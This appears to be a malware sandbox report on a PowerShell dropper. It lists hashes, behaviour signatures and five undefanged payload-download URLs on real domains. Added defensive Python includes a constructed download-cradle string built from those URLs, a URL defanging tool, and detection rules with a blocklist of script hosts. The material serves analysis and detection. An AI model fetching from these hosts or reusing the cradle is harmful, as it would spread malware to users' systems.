General

  • Target

    1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

  • Size

    203KB

  • Sample

    241113-pa9sga1ley

  • MD5

    170c6643bc47faf1f4b4d2b178921e81

  • SHA1

    bd27340f7a873e352860e90d3e6eb9df70f9e1f1

  • SHA256

    1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

  • SHA512

    0e164bc194d67bfffad1e9009eca73347195ffb94b0f7bcb1c55743524c4cb2c065280bdd437ac976c18f9871c832b26653e746787e10efde0e392c5d61f7e0b

  • SSDEEP

    3072:702y/GdyEktGDWLS0HZWD5w8K7Nk9pD7IBU4Cqz1Jf+49dl3lF:702k42tGiL3HJk9pD7b4Cqzf+4Hl3j

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated URLs (exe.dropper)

    http://joaoleobarbieri.adv.br/test/l4d6638v6l-fotnu5m-867027278/
    http://kaplanforklift.com/web_map/PmTuIEQ/
    http://londontravel.com.ar/brc/HsGpuPR/
    https://leavenworthrental.com/calendar/aoo-ue7-653740/
    http://lareserva.com.py/aloja/AOISroJmq/
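The five exe.dropper URLs are the payload locations the deobfuscated PowerShell tries in turn. The Python below is an added illustration, not part of the sandbox report and not the sample's own script: it pulls such URLs out of a deobfuscated cradle and defangs them for sharing. The cradle text is constructed to mirror the common shape of these droppers (one string of URLs split on a delimiter, then a download loop); the variable names and the `DownloadFile` loop are assumptions, only the URLs come from the report.

```python
import re
from urllib.parse import urlsplit

# Constructed stand-in for a deobfuscated PowerShell dropper: the five report
# URLs packed into one string and split on '@'. Not the sample's real script.
SAMPLE_PS1 = (
    "$u = 'http://joaoleobarbieri.adv.br/test/l4d6638v6l-fotnu5m-867027278/@"
    "http://kaplanforklift.com/web_map/PmTuIEQ/@"
    "http://londontravel.com.ar/brc/HsGpuPR/@"
    "https://leavenworthrental.com/calendar/aoo-ue7-653740/@"
    "http://lareserva.com.py/aloja/AOISroJmq/'.Split('@');"
    "foreach ($x in $u) { try { (New-Object Net.WebClient).DownloadFile($x, $p); break } catch {} }"
)

# A URL ends at whitespace, a quote, an angle bracket or the '@' the cradle splits on.
URL_RE = re.compile(r"https?://[^\s'\"@<>]+", re.IGNORECASE)


def extract_urls(text):
    """Return the unique URLs in the script text, in first-seen order."""
    seen, out = set(), []
    for m in URL_RE.finditer(text):
        url = m.group(0).rstrip(".,;)")  # trailing punctuation belongs to the script, not the URL
        if url not in seen:
            seen.add(url)
            out.append(url)
    return out


def defang(url):
    """Rewrite to hxxp://host[.]tld/path so the indicator cannot be clicked by accident."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower().replace("http", "hxxp")
    query = f"?{parts.query}" if parts.query else ""
    return f"{scheme}://{parts.netloc.replace('.', '[.]')}{parts.path}{query}"


def ioc_records(text):
    """One record per URL, typed the way the report labels them (exe.dropper)."""
    return [
        {"type": "exe.dropper", "url": u, "host": urlsplit(u).hostname, "defanged": defang(u)}
        for u in extract_urls(text)
    ]


if __name__ == "__main__":
    for rec in ioc_records(SAMPLE_PS1):
        print(f"{rec['type']:<12} {rec['host']:<28} {rec['defanged']}")
```

Run against a real deobfuscated script the regex needs no change; only the constructed `SAMPLE_PS1` is specific to this page.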

Targets

    • Target

      1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

    • Size

      203KB

    • MD5

      170c6643bc47faf1f4b4d2b178921e81

    • SHA1

      bd27340f7a873e352860e90d3e6eb9df70f9e1f1

    • SHA256

      1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

    • SHA512

      0e164bc194d67bfffad1e9009eca73347195ffb94b0f7bcb1c55743524c4cb2c065280bdd437ac976c18f9871c832b26653e746787e10efde0e392c5d61f7e0b

    • SSDEEP

      3072:702y/GdyEktGDWLS0HZWD5w8K7Nk9pD7IBU4Cqz1Jf+49dl3lF:702k42tGiL3HJk9pD7b4Cqzf+4Hl3j

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell was launched with its display window hidden, keeping the dropper's console off the user's screen.

    • Drops file in System32 directory
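The four signatures above are each a simple rule over process, file and network events. The Python below is an added example, not the sandbox's own detection code: it replays those rules over a constructed event stream shaped like Sysmon process-create, file-create and network-connect records (fields `image`, `parent_image`, `cmdline`, `path`). The image paths, the `-enc AAAA` placeholder and the dropped-file name are assumptions; the report does not name the dropped file. The hidden-window check matches PowerShell's prefix rules, so `-w h`, `-win hid` and `-WindowStyle Hidden` are all caught.

```python
import ntpath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Living-off-the-land binaries that should not be opening outbound connections on their own.
NETWORK_BLOCKLIST = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                     "cscript.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
SYSTEM32 = "c:\\windows\\system32\\"

# Constructed events (not from the report): Word spawns a hidden PowerShell that
# writes into System32 and then reaches out to one of the dropper hosts.
SAMPLE_EVENTS = [
    {"type": "process",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmdline": "powershell -nop -w hidden -enc AAAA"},  # AAAA is a placeholder, not real payload
    {"type": "file_write",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "path": "C:\\Windows\\System32\\dropped.exe"},       # assumed name
    {"type": "network",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "dest": "kaplanforklift.com:80"},
]
# Constructed benign control: an admin script run from Explorer with a visible window.
BENIGN_EVENTS = [
    {"type": "process",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": "powershell -NoProfile -File C:\\scripts\\backup.ps1"},
]


def image_name(path):
    return ntpath.basename(path).lower()


def hidden_window(cmdline):
    """True if the command line requests a hidden window.
    PowerShell accepts any unambiguous prefix of -WindowStyle and of the value
    Hidden (and 1 is the enum value for Hidden), so match by prefix, not equality."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok[:1] in ("-", "/") and len(tok) > 1 and "windowstyle".startswith(tok[1:].lower()):
            val = toks[i + 1].strip("\"'").lower()
            if val == "1" or (val and "hidden".startswith(val)):
                return True
    return False


def evaluate(events):
    """Return the set of signature names (as the report words them) the events trigger."""
    hits = set()
    for ev in events:
        img = image_name(ev["image"])
        if ev["type"] == "process":
            if image_name(ev["parent_image"]) in OFFICE_PARENTS and img in SCRIPT_HOSTS:
                hits.add("Process spawned unexpected child process")
            if img in {"powershell.exe", "pwsh.exe"} and hidden_window(ev["cmdline"]):
                hits.add("Command and Scripting Interpreter: PowerShell")
        elif ev["type"] == "file_write":
            # Any write under System32 by a user-launched process is worth a flag.
            if ev["path"].lower().startswith(SYSTEM32):
                hits.add("Drops file in System32 directory")
        elif ev["type"] == "network":
            if img in NETWORK_BLOCKLIST:
                hits.add("Blocklisted process makes network request")
    return hits


if __name__ == "__main__":
    for name in sorted(evaluate(SAMPLE_EVENTS)):
        print("HIT:", name)
    print("benign hits:", evaluate(BENIGN_EVENTS))
```

Feeding real Sysmon output only requires mapping EventID 1, 11 and 3 records onto the three event types; the rules themselves are the same ones that produced the 10/10 score.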

MITRE ATT&CK Enterprise v15

Tasks